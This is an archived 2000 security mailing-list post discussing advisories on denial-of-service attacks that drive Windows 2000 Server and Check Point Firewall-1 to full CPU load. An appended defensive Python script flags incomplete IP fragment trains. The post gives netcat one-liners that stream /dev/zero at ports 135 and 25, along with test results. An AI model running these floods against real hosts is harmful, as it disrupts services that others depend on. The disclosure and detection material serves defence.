Vulnerability Development mailing list archives
Win2k and /dev/zero
From: pete () S3 INTEGRALIS CO UK (Pete Philips)
Date: Mon, 3 Jul 2000 11:11:22 +0100
Anyone played with this yet?
SecureXpert Labs Advisory [SX-20000620-2] - Multiple ports/protocols partial Denial of Service in Microsoft Windows 2000 Server

Summary

Multiple ports and protocols on Microsoft Windows 2000 Server are susceptible to a simple network attack which raises CPU utilization on Windows 2000 Server to 100%.
My initial results (tested locally on a LAN) are:

Using:
  % nc -u <host> 135 < /dev/zero

Results:
  Win2k = 100% CPU for duration of attack
  NT4 = 55% CPU for duration
  NT4 + MS00-029 patch = No effect

The effect of the Jolt2 patch and tcpdump output indicate that this is a fragmentation attack variation. My tests yielded multiple fragments of the form:

  20780:1480@various (Frag ID:size@offset)

Anyone tried the Firewall-1 variation?
SecureXpert Labs Advisory [SX-20000620-3] - Partial Denial of Service in Check Point Firewall-1 on Windows NT

Sending a stream of binary zeros over the network to the SMTP port on the firewall raises the target system's load to 100% while the load on the attacker's system machine remains relatively low. This can easily be reproduced from a Linux system using netcat with an input of /dev/zero, with a command such as "nc firewall 25 < /dev/zero".
Pete.

---------------------------------------------------------------
Pete Philips
Integralis S3 Team
E-mail: pete.philips () integralis co uk
Phone: +44 118 930 6060
PGP Key: http://www.s3.integralis.co.uk/pgp/pete.pgp
---------------------------------------------------------------
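A defender-side check for the fragment pattern reported in the message above, as an added example that is not part of the original post: it groups tcpdump fragment annotations by source, destination and IP ID and flags datagrams that pile up fragments without ever completing. The capture lines and addresses are constructed, the threshold is an assumption, and the input is assumed to use the classic tcpdump `(frag ID:size@offset+)` text format.

```python
import re
from collections import defaultdict

# Classic tcpdump fragment annotation: (frag ID:size@offset), "+" = more fragments follow.
FRAG = re.compile(r"\(frag (\d+):(\d+)@(\d+)(\+?)\)")
# Source and destination IPv4 address, each with an optional trailing ".port".
ADDR = re.compile(r"(\d+\.\d+\.\d+\.\d+)(?:\.\d+)? > (\d+\.\d+\.\d+\.\d+)(?:\.\d+)?:")

# Constructed sample capture (hypothetical hosts): one unfinished fragment
# train to UDP 135 and one ordinary two-fragment datagram.
SAMPLE = """\
11:11:22.100001 10.0.0.5.1025 > 10.0.0.9.135: udp 8192 (frag 20780:1480@0+)
11:11:22.100102 10.0.0.5 > 10.0.0.9: (frag 20780:1480@1480+)
11:11:22.100203 10.0.0.5 > 10.0.0.9: (frag 20780:1480@2960+)
11:11:22.100304 10.0.0.5 > 10.0.0.9: (frag 20780:1480@4440+)
11:11:22.100405 10.0.0.5 > 10.0.0.9: (frag 20780:1480@5920+)
11:11:23.200001 10.0.0.7.2049 > 10.0.0.9.2049: udp 2000 (frag 311:1480@0+)
11:11:23.200102 10.0.0.7 > 10.0.0.9: (frag 311:528@1480)
""".splitlines()

def summarize(lines):
    """Group fragments by (src, dst, IP ID) and collect per-datagram statistics."""
    stats = defaultdict(lambda: {"count": 0, "bytes": 0, "offsets": set(), "final": False})
    for line in lines:
        frag, addr = FRAG.search(line), ADDR.search(line)
        if not (frag and addr):
            continue  # not a fragment line
        frag_id, size, offset, more = frag.groups()
        s = stats[(addr.group(1), addr.group(2), int(frag_id))]
        s["count"] += 1
        s["bytes"] += int(size)
        s["offsets"].add(int(offset))
        s["final"] = s["final"] or more == ""  # last fragment carries no "+"
    return stats

def flag(stats, min_fragments=4):
    """Return datagrams with many fragments that never complete or repeat offsets."""
    return sorted(
        key for key, s in stats.items()
        if s["count"] >= min_fragments
        and (not s["final"] or len(s["offsets"]) < s["count"])
    )

if __name__ == "__main__":
    for src, dst, frag_id in flag(summarize(SAMPLE)):
        print(f"suspicious fragment train {src} -> {dst} id={frag_id}")
```
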